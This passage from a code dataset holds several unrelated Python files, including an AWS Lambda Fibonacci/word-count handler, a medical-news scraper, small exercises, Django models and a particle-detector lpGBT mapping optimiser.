{\"midleft\": midleft})\n self.done = False\n \n def draw(self, surface):\n self.label.draw(surface)\n\n \nclass TickerTape(object):\n def __init__(self):\n top = 520\n self.rect = pg.Rect(0, top, prepare.SCREEN_SIZE[0], prepare.SCREEN_SIZE[1] - top) \n self.duration = 9000 \n self.news_items = []\n self.labels = []\n self.start_pos = self.rect.right + 10, self.rect.centery\n self.animations = pg.sprite.Group()\n \n def set_done(self, ticker):\n ticker.done = True\n \n def add_news(self, news_item):\n self.news_items.append(news_item)\n \n def update(self, dt):\n self.animations.update(dt)\n self.labels = [x for x in self.labels if not x.done]\n \n if self.news_items:\n if not self.labels or (self.labels[-1].label.rect.right < prepare.SCREEN_SIZE[0] - 60):\n item = self.news_items[0]\n ticker = TickerLabel(item, self.start_pos)\n self.labels.append(ticker)\n ani = Animation(x=-500, duration=self.duration, round_values=True)\n ani.start(ticker.label.rect)\n task = Task(self.set_done, self.duration, args=(ticker,))\n self.animations.add(task, ani)\n if len(self.news_items) > 1:\n self.news_items = self.news_items[1:]\n else:\n self.news_items = []\n\n def draw(self, surface):\n pg.draw.rect(surface, pg.Color(43,68,87), self.rect)\n pg.draw.line(surface, pg.Color(\"gray40\"), self.rect.topleft, self.rect.topright, 2) \n for label in self.labels:\n label.draw(surface)\n ","repo_name":"iminurnamez/Market-Master","sub_path":"data/components/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17751060577","text":"from datetime import datetime, timedelta\nfrom rl_bakery.engine.timing_data import TimingData\nfrom rl_bakery.data_manager.data_manager import DATANAME\nfrom rl_bakery.operation.build_time_step_operation import BuildTimestepOperation\nfrom rl_bakery.spark_utilities import PySparkTestCase\nfrom unittest import TestCase\nfrom unittest.mock import call, patch\nfrom omegaconf import OmegaConf\nimport mock\n\nclass MockEnv:\n\n def build_time_steps(self, previous_run_dt, current_run_dt):\n 
pass\n\nclass BuildTimestepOperationTest(PySparkTestCase, TestCase):\n @patch('rl_bakery.data_manager.data_manager.DataManager', autospec=True)\n def test_timestep_operation(self, mock_data_manager):\n start_dt = datetime.now()\n training_interval = timedelta(days=1)\n\n mock_env = mock.MagicMock()\n\n conf = OmegaConf.from_dotlist([\"project.tensorboard_path=/tmp/test_tb/\"])\n mock_app = mock.MagicMock()\n mock_app.timing_data = TimingData(start_dt=start_dt, training_interval=training_interval)\n mock_app.env = mock_env\n mock_app.config = conf\n mock_env.env_id_cols = [\"env_id_1\", \"env_id_2\"]\n mock_env.ts_id_col = \"ts_1\"\n mock_env.obs_cols = [\"obs_1\", \"obs_2\"]\n\n mock_timestep = [{\"env_id_1\": 1, \"env_id_2\": 2, \"ts_1\": 1, \"discount\": 1.0, \"obs_1\": 1, \"obs_2\": 2, \"action\": 1, \"reward\": 0.0,\n \"step_type\": 0}]\n mock_timestep_df = self.spark.createDataFrame(mock_timestep)\n\n metadata_dict = {\n \"available_data\": [(\"test_data\", 0)]\n }\n\n mock_env.build_time_steps = mock.MagicMock(return_value=mock_timestep_df)\n mock_data_manager.get_latest.return_value = metadata_dict\n\n run_id = 1\n operation = BuildTimestepOperation(mock_app, mock_data_manager)\n operation.run(run_id)\n\n mock_data_manager.get_latest.assert_any_call(DATANAME.RUN_CONTEXT, run_id)\n\n expected_start_dt = start_dt\n expected_end_dt = start_dt + training_interval\n mock_env.build_time_steps.assert_called_with(expected_start_dt, expected_end_dt)\n\n expected_metadata = {\n \"available_data\": [\n (\"test_data\", 0),\n (DATANAME.TIMESTEP, run_id)\n ]\n }\n\n calls = [\n call(mock_timestep_df, DATANAME.TIMESTEP, run_id),\n call(expected_metadata, DATANAME.RUN_CONTEXT, run_id)]\n mock_data_manager.store.assert_has_calls(calls, any_order=False)\n","repo_name":"zynga/rl-bakery","sub_path":"rl_bakery/operation/test_build_time_step_operation.py","file_name":"test_build_time_step_operation.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"34"}
{"seq_id":"8322847304","text":"import json\nimport re\nfrom datetime import datetime\nfrom collections import defaultdict\nimport boto3\n\ndef numbers_to_csv_string(numbers: list[int]):\n\n output = 'previous Fibonacci number,observed number,next Fibonacci number\\n'\n\n # edge case - list is empty -> output is just the header (column names)\n if len(numbers) == 0:\n return output\n\n # pointer for going through numbers list\n left = 0\n\n # checking and processing negative numbers (assuming we didn't reach the end of the numbers list)\n while left < len(numbers) and numbers[left] < 0:\n\n # adding string consisting of the number surrounded by commas with line break at the end\n # to the end of output variable\n output += ',' + str(numbers[left]) + ',\\n'\n left += 1\n\n # if current number is 0 (assuming we didn't reach the end of the numbers list)\n if left < len(numbers) and numbers[left] == 0:\n output += ',0,1\\n'\n left += 1\n\n # if current number is 1 (assuming we didn't reach the end of the numbers list)\n if left < len(numbers) and numbers[left] == 1:\n output += '0,1,1\\n'\n left += 1\n\n # setting up the prev, current and nex variables (to store previous, current and next number in the sequence\n # respectively)\n prev = 1\n current = 1\n nex = prev + current\n\n # going through the numbers from where we left off with the left pointer\n for n in numbers[left:]:\n\n # if n is bigger than the current number in the fibonacci sequence, generate new number in the 
sequence by adding\n # two previous numbers, eventually n will equal a fib number or be smaller than it\n while n > current:\n prev, current = current, current + prev\n nex = current + prev\n\n # n equals a fibonacci number exactly\n # add prev, current and next with commas between as a row to the output string\n if n == current:\n to_append = str(prev) + ',' + str(current) + ',' + str(nex) + '\\n'\n output += to_append\n\n # n is smaller than the current fibonacci number (it lies in between fibonacci numbers), add just n with commas around\n # as a row to the output string\n elif n < current:\n output += ',' + str(n) + ',\\n'\n\n return output\n\n\ndef fibonacci_process(numbers: list):\n\n # checking if the list is empty - no integers/numbers found\n if len(numbers) == 0:\n return numbers_to_csv_string([])\n\n # I turn numbers into set to get just the unique numbers as it is in the example output\n # print(numbers)\n numbers = list(set(numbers))\n\n # convert numbers to int using list comprehension - regex returns matches as strings, in general input is usually\n # by default also a string\n numbers = [int(x) for x in numbers]\n # sort numbers list inplace\n numbers.sort()\n\n #convert numbers to a CSV compliant string using numbers_to_csv_string function\n output = numbers_to_csv_string(numbers)\n\n return output\n\n\ndef count_words(words: list):\n words = list(map(str.lower, words))\n word_count = defaultdict(int)\n\n for w in words:\n # print(w)\n word_count[w] += 1\n\n return word_count\n\ndef filename_now():\n now = datetime.now()\n return now.strftime(\"%Y_%m_%d__%H_%M_%S__%f\")\n\ndef lambda_handler(event, context):\n\n s3 = boto3.client('s3')\n bucket = 'word-count-fibonacci-005'\n\n # no data in post -> body doesn't exist\n if 'body' not in event:\n\n transaction_response = {}\n transaction_response['message'] = 'Error, no post data'\n\n response_object = {}\n response_object['statusCode'] = 400\n response_object['headers'] = {}\n response_object['headers']['Content-Type'] = 'application/json'\n response_object['message'] = 'Error, no post data'\n response_object['body'] = json.dumps(transaction_response)\n\n return response_object\n\n body = event['body']\n print(event)\n print(body)\n\n # joining body (list) into one long string\n body = ''.join(body)\n\n # print(len(body))\n\n # Using regex I'm matching all 'digit collections' to find integers. I treat '.' 
as the separator as that seems to\n # be the case looking at the example input/output\n # as negative integers are also integers they are also matched\n numbers = re.findall('-?\\d+', body)\n\n str_csv = fibonacci_process(numbers)\n # print(str_csv)\n\n file_ = filename_now() + '.csv'\n byte_stream = bytes(str_csv.encode('UTF-8'))\n r = s3.put_object(Bucket=bucket, Key=file_, Body=byte_stream)\n print('s3 put integers content: ', r)\n\n # matching just latin letters: words = re.findall('[A-Za-z]+', body)\n\n # following matches unicode letters\n words = re.findall('[\\u00BF-\\u1FFF\\u2C00-\\uD7FFA-Za-z]+', body)\n words = count_words(words)\n\n # strip the whole '.csv' extension (4 characters) before appending '.json'\n file_ = file_[:-4] + '.json'\n byte_stream = bytes(json.dumps(words).encode('UTF-8'))\n r = s3.put_object(Bucket=bucket, Key=file_, Body=byte_stream)\n print('s3 put words content: ', r)\n\n transaction_response = {}\n\n # transaction_response['numbers'] = numbers\n # transaction_response['string_csv'] = str_csv\n # transaction_response['words'] = words\n transaction_response['message'] = 'Files generated'\n\n response_object = {}\n response_object['statusCode'] = 200\n response_object['headers'] = {}\n response_object['headers']['Content-Type'] = 'application/json'\n response_object['message'] = 'Hello from lambda'\n response_object['body'] = json.dumps(transaction_response)\n\n return response_object\n","repo_name":"python-wizard/tasks-lambda-pandas","sub_path":"task1_lambda/lambda_handler.py","file_name":"lambda_handler.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"22875954339","text":"import heapq\nfrom collections import defaultdict\n\nlines = None\n\n\ndef myinput():\n global lines\n if lines is None:\n lines = [it.strip() for it in open(\"../in.txt\").readlines()]\n tmp = lines[0]\n lines = lines[1:]\n return tmp\n\n\n# =====================\n# input = myinput\n\n\ndef solve():\n n, k = map(int, input().split())\n # aa = [int(it) for it in input().split()]\n if k * (k + 1) // 2 > n:\n print(\"-1\")\n return\n a = int(n / k - (k - 1) / 2)\n more_to_move = n - sum(range(a,a+k))\n res = 1\n def mul(f):\n nonlocal res\n res *= f\n res %= 10**9+7\n n_stay = k-more_to_move\n for i in range(a,a+n_stay):\n mul(i)\n mul(i-1)\n for i in range(a+n_stay+1,a+k+1):\n mul(i)\n mul(i-1)\n print(res)\n\n\n# ======================\nT = int(input().strip())\nfor tid in range(1, 1 + T):\n solve()\n","repo_name":"swantescholz/algorithmic-utils","sub_path":"smackdown/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"27480917013","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\n\nif __name__ == '__main__':\n\n links = []\n elements = []\n pool = ['спид', 'рак', 'инсульт', 'орви', 'диабет', 'covid-19', 'гепатит']\n # pool = ['гепатит']\n\n # url = 'https://minobrnauki.gov.ru/press-center/'\n root = 'https://medportal.ru'\n\n for i in range(1, 282):\n if i == 1:\n url = 'https://medportal.ru/mednovosti/all/'\n else:\n url = 'https://medportal.ru/mednovosti/all/?page=' + str(i)\n\n print(str(i) + ' / 281')\n response = requests.get(url=url)\n response.encoding = 'utf-8'\n soup = BeautifulSoup(response.text, 'lxml')\n articles = soup.find_all('a', class_='title')\n\n for elem in articles:\n string = str(elem)\n index = string.find(\"\\\">\", 23, len(string))\n href = string[23:index]\n link = root + 
href\n\n try:\n response = requests.get(url=str(link))\n soup = BeautifulSoup(response.text, 'lxml')\n article_text = soup.find('div', class_='article')\n for word in str(article_text.text).split():\n article_elem = word.lower()\n if article_elem in pool:\n print('Статья подходит:')\n print(link)\n links.append(link)\n elements.append(article_elem)\n break\n except:\n continue\n\n frame = {'Links': pd.Series(links), 'Words': pd.Series(elements)}\n df = pd.DataFrame(frame)\n filename = 'stat.csv'\n df.to_csv(filename)\n","repo_name":"Aleksey1123/AI_Project","sub_path":"scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14974474906","text":"\"\"\"\nGiven an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.\n\nYou may assume that the array is non-empty and the majority element always exist in the array.\n\nExample 1:\n\nInput: [3,2,3]\nOutput: 3\nExample 2:\n\nInput: [2,2,1,1,1,2,2]\nOutput: 2\n\"\"\"\n\nclass Solution:\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n d = {}\n for n in nums:\n if n in d.keys():\n d[n] += 1\n else:\n d[n] = 1\n for key, value in d.items():\n if value > len(nums) / 2:\n return key","repo_name":"ipudu/leetcode","sub_path":"solutions/169_majority-element.py","file_name":"169_majority-element.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"35825904993","text":"import sys\r\n\r\n\r\ndef calc_bmi(height, weight):\r\n bmi = (weight / height ** 2) * 703\r\n return bmi\r\n\r\n\r\ndef getCategory(bmi):\r\n if bmi >= 30:\r\n return\"obese\"\r\n\r\n elif 25 <= bmi < 30:\r\n return\"overweight\"\r\n\r\n elif 18.5 <= bmi < 25:\r\n return\"normal\"\r\n\r\n else:\r\n return\"underweight\"\r\n\r\n\r\nfor i in range(1, len(sys.argv)):\r\n name = sys.argv[i].split(\",\")[0]\r\n capName = name.capitalize()\r\n height = int(sys.argv[i].split(\",\")[3])\r\n weight = int(sys.argv[i].split(\",\")[4])\r\n bmi = calc_bmi(height, weight)\r\n category = getCategory(bmi)\r\n print(\"{}: {:.2f} , {}\".format(capName, bmi, category))\r\n","repo_name":"Awright919/Data-Programming-1","sub_path":"Assignment_6/Assign6_2_2.py","file_name":"Assign6_2_2.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41973999520","text":"#!/usr/bin/python3\n\"\"\"A Python script that takes 2 arguments\"\"\"\nimport requests\nfrom sys import argv\n\nif __name__ == \"__main__\":\n url = \"https://api.github.com/repos/{}/{}/commits?per_page=10\"\\\n .format(argv[2], argv[1])\n\n response = requests.get(url)\n commits = response.json()\n for commit in commits:\n print(\"{}: {}\".format(commit.get(\"sha\"),\n commit.get(\"commit\").get(\"author\").get(\"name\")))\n","repo_name":"ROgbuagu05/alx-higher_level_programming","sub_path":"0x11-python-network_1/100-github_commits.py","file_name":"100-github_commits.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5378634272","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\n\nclass CustomUser(AbstractUser):\n favorites = models.TextField(blank=True, null=True)\n\n def 
__str__(self):\n return \"%s %s %s\" % (self.first_name, self.last_name, self.email)\n\n\nclass Blog(models.Model):\n title = models.CharField(max_length=100)\n content = models.TextField(blank=True, null=True)\n vote = models.IntegerField(default=0)\n accountID = models.ForeignKey(CustomUser, on_delete=models.CASCADE)\n","repo_name":"tongtrieu76/Django-Api-Learning","sub_path":"CustomUser_API/Learning/data/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"847902198","text":"#!/usr/bin/env python3\nimport sys\nsys.path.insert(1, './externals')\nimport ROOT\nimport numpy as np\nimport mlrose_mod as mlrose # Author: Genevieve Hayes https://github.com/gkhayes/mlrose/tree/master/mlrose\nimport time\nimport yaml\nimport signal\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, OneHotEncoder\nfrom sklearn.metrics import accuracy_score\n\nfrom process import getModuleHists, getlpGBTHists, getMiniGroupHists, getMinilpGBTGroups, getMiniModuleGroups, getBundles, getBundledlpgbtHists, getBundledlpgbtHistsRoot, calculateChiSquared, getMaximumNumberOfModulesInABundle\nfrom process import loadDataFile, loadModuleTowerMappingFile, getTCsPassing, getlpGBTLoadInfo, getHexModuleLoadInfo, getModuleTCHists, getMiniTowerGroups, getTowerBundles\nfrom plotting import plot, plot2D\nfrom example_minigroup_configuration import example_minigroup_configuration\n\nfrom geometryCorrections import applyGeometryCorrections\n\nchi2_min = 50000000000000000000000\ncombbest = []\n\ndef handler(signum, frame):\n raise ValueError() \n\ndef plot_lpGBTLoads(MappingFile,CMSSW_Silicon,CMSSW_Scintillator):\n\n #Load external data\n data = loadDataFile(MappingFile) #dataframe \n data_tcs_passing,data_tcs_passing_scin = getTCsPassing(CMSSW_Silicon,CMSSW_Scintillator) #from CMSSW\n \n lpgbt_loads_tcs,lpgbt_loads_words,lpgbt_layers = getlpGBTLoadInfo(data,data_tcs_passing,data_tcs_passing_scin)\n\n plot(lpgbt_loads_tcs,\"loads_tcs.png\",binwidth=0.1,xtitle='Number of TCs on a single lpGBT')\n plot(lpgbt_loads_words,\"loads_words.png\",binwidth=0.1,xtitle='Number of words on a single lpGBT')\n plot2D(lpgbt_loads_tcs,lpgbt_layers,\"tcs_vs_layer.png\",xtitle='Number of TCs on a single lpGBT')\n plot2D(lpgbt_loads_words,lpgbt_layers,\"words_vs_layer.png\",xtitle='Number of words on a single lpGBT')\n\ndef plot_ModuleLoads(MappingFile,CMSSW_Silicon,CMSSW_Scintillator):\n\n #Load external data\n data = loadDataFile(MappingFile) #dataframe \n data_tcs_passing,data_tcs_passing_scin = getTCsPassing(CMSSW_Silicon,CMSSW_Scintillator) #from CMSSW\n \n lpgbt_loads_tcs,lpgbt_loads_words,lpgbt_layers = getHexModuleLoadInfo(data,data_tcs_passing,data_tcs_passing_scin)\n\n plot(lpgbt_loads_tcs,\"loads_tcs.png\",binwidth=0.1,xtitle='Number of TCs on a single lpGBT')\n plot(lpgbt_loads_words,\"loads_words.png\",binwidth=0.1,xtitle='Number of words on a single lpGBT')\n plot2D(lpgbt_loads_tcs,lpgbt_layers,\"tcs_vs_layer.png\",xtitle='Number of TCs on a single lpGBT')\n plot2D(lpgbt_loads_words,lpgbt_layers,\"words_vs_layer.png\",xtitle='Number of words on a single lpGBT')\n \ndef produce_AllocationFile(MappingFile,allocation,minigroup_type=\"minimal\"):\n\n #Load mapping file\n data = loadDataFile(MappingFile) \n\n #List of which minigroups are assigned to each bundle \n configuration = 
np.hstack(np.load(allocation,allow_pickle=True))\n\n #Get minigroups\n minigroups,minigroups_swap = getMinilpGBTGroups(data, minigroup_type)\n \n #Bundle together minigroup configuration\n bundles = getBundles(minigroups_swap,configuration)\n\n #Open output file\n fileout = open('allocation_20200729_1.txt', 'w')\n fileout.write( '(lpGBT_number) (number_modules) (sil=0scin=1) (layer) (u/eta) (v/phi) (number_elinks)\\n' )\n for b,bundle in enumerate(bundles):\n fileout.write(str(b) + \"\\n\")\n for minigroup in bundle:\n\n #list lpgbts in minigroup:\n for lpgbt in minigroups_swap[minigroup]:\n fileout.write(str(lpgbt) + \" \")\n \n #Get modules associated to each lpgbt:\n data_list = data[ ((data['TPGId1']==lpgbt) | (data['TPGId2']==lpgbt)) ]\n fileout.write(str(len(data_list)) + \" \")\n for index, row in data_list.iterrows():\n if ( row['density']==2 ):\n fileout.write(\"1 \" + str(row['layer']) + \" \" + str(row['u']) + \" \" + str(row['v']) + \" \" + str(row['TPGeLinkSum']) + \" \" )\n else:\n fileout.write(\"0 \" + str(row['layer']) + \" \" + str(row['u']) + \" \" + str(row['v']) + \" \" + str(row['TPGeLinkSum']) + \" \" )\n fileout.write(\"\\n\")\n \n fileout.close()\n\ndef produce_nTCsPerModuleHists(MappingFile,allocation,CMSSW_ModuleHists,minigroup_type=\"minimal\",correctionConfig=None):\n\n #Load mapping file\n data = loadDataFile(MappingFile) \n\n #List of which minigroups are assigned to each bundle \n configuration = np.hstack(np.load(allocation,allow_pickle=True))\n\n #Get minigroups\n minigroups,minigroups_swap = getMinilpGBTGroups(data, minigroup_type)\n\n #Get list of which modules are in each minigroup\n minigroups_modules = getMiniModuleGroups(data,minigroups_swap)\n \n #Bundle together minigroup configuration\n bundles = getBundles(minigroups_swap,configuration)\n\n #Get nTC hists per module\n module_hists = getModuleTCHists(CMSSW_ModuleHists)\n \n #Open output file\n outfile = ROOT.TFile.Open(\"hists_per_bundle.root\",\"RECREATE\")\n for b,bundle in enumerate(bundles):\n outfile.mkdir(\"bundle_\" + str(b))\n outfile.cd(\"bundle_\" + str(b)) \n for minigroup in bundle:\n\n for module in minigroups_modules[minigroup]:\n\n module_hists[tuple(module)].Write()\n\n outfile.cd()\n\n \ndef check_for_missing_modules_inMappingFile(MappingFile,CMSSW_Silicon,CMSSW_Scintillator):\n\n #Check for modules missing in the mapping file\n \n #Load external data\n data = loadDataFile(MappingFile) #dataframe \n data_tcs_passing,data_tcs_passing_scin = getTCsPassing(CMSSW_Silicon,CMSSW_Scintillator) #from CMSSW\n \n mappingfile_sil = data[data['density']<2][['layer', 'u', 'v']]\n mappingfile_scin = data[data['density']==2][['layer', 'u', 'v']]\n\n cmssw_sil = data_tcs_passing[['u','v','layer','nTCs']]\n cmssw_scin = data_tcs_passing_scin[['u','v','layer','nTCs']]\n\n #onlymapping_sil = mappingfile.merge(cmssw.drop_duplicates(), on=['u','v','layer'],how='left', indicator=True)\n onlycmssw_sil = cmssw_sil.merge(mappingfile_sil.drop_duplicates(), on=['u','v','layer'],how='left', indicator=True)\n onlycmssw_scin = cmssw_scin.merge(mappingfile_scin.drop_duplicates(), on=['u','v','layer'],how='left', indicator=True)\n\n onlycmssw_sil = onlycmssw_sil[onlycmssw_sil['_merge'] == 'left_only']\n onlycmssw_scin = onlycmssw_scin[onlycmssw_scin['_merge'] == 'left_only']\n\n print (\"Silicon\")\n print (onlycmssw_sil[onlycmssw_sil['nTCs']>0][['layer','u','v']].to_string(index=False))\n print (\"Scintillator\")\n print (onlycmssw_scin[onlycmssw_scin['nTCs']>0][['layer','u','v']].to_string(index=False))\n\ndef 
check_for_missing_modules_inCMSSW(MappingFile,CMSSW_Silicon,CMSSW_Scintillator):\n\n #Load external data\n data = loadDataFile(MappingFile) #dataframe \n data_tcs_passing,data_tcs_passing_scin = getTCsPassing(CMSSW_Silicon,CMSSW_Scintillator) #from CMSSW\n getHexModuleLoadInfo(data,data_tcs_passing,data_tcs_passing_scin,True)\n \n \n\ndef study_mapping(MappingFile,CMSSW_ModuleHists,algorithm=\"random_hill_climb\",initial_state=\"best_so_far\",random_seed=None,max_iterations=100000,output_dir=\".\",print_level=0, minigroup_type=\"minimal\",correctionConfig=None, phisplitConfig=None, chi2Config=None, TowerMappingFile=None):\n\n #Load external data\n data = loadDataFile(MappingFile) #dataframe\n\n try:\n\n #Configuration for how to divide TCs into phidivisionX and phidivisionY (traditionally phi > 60 and phi < 60)\n split = \"per_roverz_bin\"\n phidivisionX_fixvalue_min = 55\n phidivisionY_fixvalue_max = None\n \n if phisplitConfig != None:\n split = phisplitConfig['type']\n if 'phidivisionX_fixvalue_min' in phisplitConfig.keys():\n phidivisionX_fixvalue_min = phisplitConfig['phidivisionX_fixvalue_min']\n if 'phidivisionY_fixvalue_max' in phisplitConfig.keys():\n phidivisionY_fixvalue_max = phisplitConfig['phidivisionY_fixvalue_max']\n\n inclusive_hists,module_hists = getModuleHists(CMSSW_ModuleHists, split = split, phidivisionX_fixvalue_min = phidivisionX_fixvalue_min, phidivisionY_fixvalue_max = phidivisionY_fixvalue_max)\n\n except EnvironmentError:\n print ( \"File \" + CMSSW_ModuleHists + \" does not exist\" )\n exit()\n # Apply various corrections to r/z distributions from CMSSW\n\n if correctionConfig != None:\n print ( \"Applying geometry corrections\" )\n applyGeometryCorrections( inclusive_hists, module_hists, correctionConfig )\n\n include_errors_in_chi2 = False\n include_max_modules_in_chi2 = False\n include_max_towers_in_chi2 = False\n max_modules_weighting_factor = 1000\n max_towers_weighting_factor = 1000 #default assumed to mirror max_modules_weighting_factor, so it is always defined\n if chi2Config != None:\n if 'include_errors_in_chi2' in chi2Config.keys():\n include_errors_in_chi2 = chi2Config['include_errors_in_chi2']\n if 'include_max_modules_in_chi2' in chi2Config.keys():\n include_max_modules_in_chi2 = chi2Config['include_max_modules_in_chi2']\n if 'max_modules_weighting_factor' in chi2Config.keys():\n max_modules_weighting_factor = chi2Config['max_modules_weighting_factor']\n if 'include_max_towers_in_chi2' in chi2Config.keys():\n include_max_towers_in_chi2 = chi2Config['include_max_towers_in_chi2']\n if 'max_towers_weighting_factor' in chi2Config.keys():\n max_towers_weighting_factor = chi2Config['max_towers_weighting_factor']\n\n #Load tower data if required\n if include_max_towers_in_chi2:\n try:\n towerdata = loadModuleTowerMappingFile(TowerMappingFile)\n except EnvironmentError:\n print ( \"File \" + TowerMappingFile + \" does not exist\" )\n exit()\n \n #Form hists corresponding to each lpGBT from module hists\n lpgbt_hists = getlpGBTHists(data, module_hists)\n\n minigroups,minigroups_swap = getMinilpGBTGroups(data, minigroup_type)\n minigroup_hists = getMiniGroupHists(lpgbt_hists,minigroups_swap,return_error_squares=include_errors_in_chi2)\n minigroup_hists_root = getMiniGroupHists(lpgbt_hists,minigroups_swap,root=True)\n #Get list of which modules are in each minigroup\n minigroups_modules = getMiniModuleGroups(data,minigroups_swap)\n\n #Get list of which towers are in each minigroup\n if include_max_towers_in_chi2:\n minigroups_towers = getMiniTowerGroups(towerdata, minigroups_modules)\n\n \n def mapping_max(state):\n global chi2_min\n global combbest\n\n max_modules = 
None\n max_towers = None\n chi2 = 0\n \n bundles = getBundles(minigroups_swap,state)\n bundled_lpgbthists = getBundledlpgbtHists(minigroup_hists,bundles)\n\n if include_max_modules_in_chi2:\n max_modules = getMaximumNumberOfModulesInABundle(minigroups_modules,bundles)\n if include_max_towers_in_chi2:\n bundled_towers = getTowerBundles(minigroups_towers, bundles)\n max_towers = len(max(bundled_towers,key=len))#Get the length of bundle with the greatest number of towers\n \n chi2 = calculateChiSquared(inclusive_hists,bundled_lpgbthists,max_modules,max_modules_weighting_factor,max_towers,max_towers_weighting_factor)\n\n typicalchi2 = 600000000000\n if include_errors_in_chi2:\n typicalchi2 = 10000000\n if (chi2 < chi2_min):\n #record the best chi2 and minigroup configuration found so far\n chi2_min = chi2\n combbest = np.copy(state)\n if ( print_level > 0 ):\n print (algorithm,\" \", chi2_min, \" \", chi2_min/typicalchi2)\n if include_max_towers_in_chi2:\n print (\"max_towers = \", max_towers)\n if include_max_modules_in_chi2:\n print (\"max_modules = \", max_modules)\n if ( print_level > 1 ):\n print (repr(combbest))\n\n return chi2\n\n init_state = []\n if (initial_state == \"example\"):\n init_state = example_minigroup_configuration\n if (initial_state[-4:] == \".npy\"):\n print (initial_state)\n init_state = np.hstack(np.load(initial_state,allow_pickle=True))\n if ( len(init_state) != len(minigroups_swap) ):\n print ( \"Initial state should be the same length as the number of mini groups\")\n exit()\n elif (initial_state == \"random\"):\n np.random.seed(random_seed)\n init_state = np.arange(len(minigroups_swap))\n np.random.shuffle(init_state)\n\n \n fitness_cust = mlrose.CustomFitness(mapping_max)\n # Define optimization problem object\n problem_cust = mlrose.DiscreteOpt(length = len(init_state), fitness_fn = fitness_cust, maximize = False, max_val = len(minigroups_swap), minigroups = minigroups_swap)\n\n # Define decay schedule\n schedule = mlrose.ExpDecay()\n #schedule = mlrose.ArithDecay()\n\n filename = \"bundles_job_\"\n filenumber = \"\"\n if ( len(sys.argv) > 2 ):\n filenumber = str(sys.argv[2])\n else:\n filenumber = \"default\"\n filename+=filenumber\n \n if ( algorithm == \"save_root\" ):\n #Save best combination so far into a root file\n bundles = getBundles(minigroups_swap,init_state)\n\n bundled_hists_root = getBundledlpgbtHistsRoot(minigroup_hists_root,bundles)\n bundled_hists = getBundledlpgbtHists(minigroup_hists,bundles)\n\n chi2 = calculateChiSquared(inclusive_hists,bundled_hists)\n newfile = ROOT.TFile(\"lpgbt_10.root\",\"RECREATE\")\n np.save(output_dir + \"/\" + filename + \"_saveroot.npy\",np.array(bundles,dtype=object))\n for sector in bundled_hists_root:\n for key, value in sector.items():\n value.Write()\n for sector in inclusive_hists:\n sector.Scale(1./24.)\n sector.Write()\n newfile.Close()\n print (\"Chi2:\",chi2)\n print (\"List of Bundles:\")\n for b,bundle in enumerate(bundles):\n print (\"\" )\n print (\"bundle\" + str(b) )\n for minigroup in bundle:\n #print (minigroup)\n lpgbts = minigroups_swap[minigroup]\n for lpgbt in lpgbts:\n print (str(lpgbt) + \", \" , end = '')\n\n elif algorithm == \"random_hill_climb\" or algorithm == \"simulated_annealing\":\n\n try:\n if (algorithm == \"random_hill_climb\"):\n best_state, best_fitness = mlrose.random_hill_climb(problem_cust, max_attempts=10000, max_iters=max_iterations, restarts=0, init_state=init_state, random_state=random_seed)\n elif (algorithm == \"simulated_annealing\"):\n best_state, best_fitness = mlrose.simulated_annealing(problem_cust, schedule = schedule, max_attempts = 100000, max_iters = 10000000, init_state = init_state, 
random_state=random_seed)\n \n\n except ValueError:\n print(\"interrupt received, stopping and saving\")\n\n finally:\n bundles = getBundles(minigroups_swap,combbest)\n np.save(output_dir + \"/\" + filename + \".npy\",np.array(bundles,dtype=object))\n file1 = open(output_dir + \"/chi2_\"+filenumber+\".txt\",\"a\")\n file1.write( \"bundles[\" + filenumber + \"] = \" + str(chi2_min) + \"\\n\" )\n file1.close( )\n\n else:\n print(\"Algorithm \"+ algorithm + \" currently not implemented\" )\n\n \ndef main():\n\n try:\n config_file = sys.argv[1]\n except IndexError:\n print (\"Please give valid config file\")\n exit()\n try:\n with open(config_file,'r') as file:\n config = yaml.load(file,Loader=yaml.FullLoader)\n except EnvironmentError:\n print (\"Please give valid config file\")\n exit()\n\n #Catch possible exceptions from batch system\n signal.signal(signal.SIGINT,handler)\n signal.signal(signal.SIGUSR1,handler)\n signal.signal(signal.SIGXCPU,handler)\n\n ROOT.TH1.SetDefaultSumw2()\n \n if ( config['function']['study_mapping'] ):\n subconfig = config['study_mapping']\n correctionConfig = None\n phisplitConfig = None\n chi2Config = None\n include_errors_in_chi2 = False\n include_max_modules_in_chi2 = False\n if 'corrections' in config.keys():\n correctionConfig = config['corrections']\n if 'chi2' in subconfig.keys():\n chi2Config = subconfig['chi2']\n if 'phisplit' in subconfig.keys():\n phisplitConfig = subconfig['phisplit']\n \n \n study_mapping(subconfig['MappingFile'],subconfig['CMSSW_ModuleHists'],algorithm=subconfig['algorithm'],initial_state=subconfig['initial_state'],random_seed=subconfig['random_seed'],max_iterations=subconfig['max_iterations'],output_dir=config['output_dir'],print_level=config['print_level'],\n minigroup_type=subconfig['minigroup_type'],correctionConfig = 